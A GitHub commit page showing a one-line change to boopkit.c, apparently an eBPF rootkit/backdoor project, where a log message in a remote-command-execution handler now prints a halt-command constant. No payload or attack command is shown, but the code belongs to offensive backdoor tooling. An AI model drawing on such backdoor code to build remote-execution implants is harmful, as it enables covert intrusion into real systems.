Skip to content

Commit

Permalink
Automatic commit from github.com/kris-nova/bin/git-save
Browse files Browse the repository at this point in the history
Signed-off-by: Kris Nóva <kris@nivenly.com>
  • Loading branch information
krisnova committed Apr 19, 2022
1 parent 2c399a3 commit 44152fc
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion boopkit.c
Original file line number Diff line number Diff line change
Expand Up @@ -257,7 +257,7 @@ int exec(char *rce) {
if (ret) {
runtime__xcap = 0; // Stop the xcap loop
runtime__boopkit = 0; // Stop the boopkit loop
boopprintf(" XX Halting boopkit: %s\n", ret);
boopprintf(" XX Halting boopkit: %s\n", BOOPKIT_RCE_CMD_HALT);
free(rce);
return 0;
}
Expand Down

0 comments on commit 44152fc

Please sign in to comment.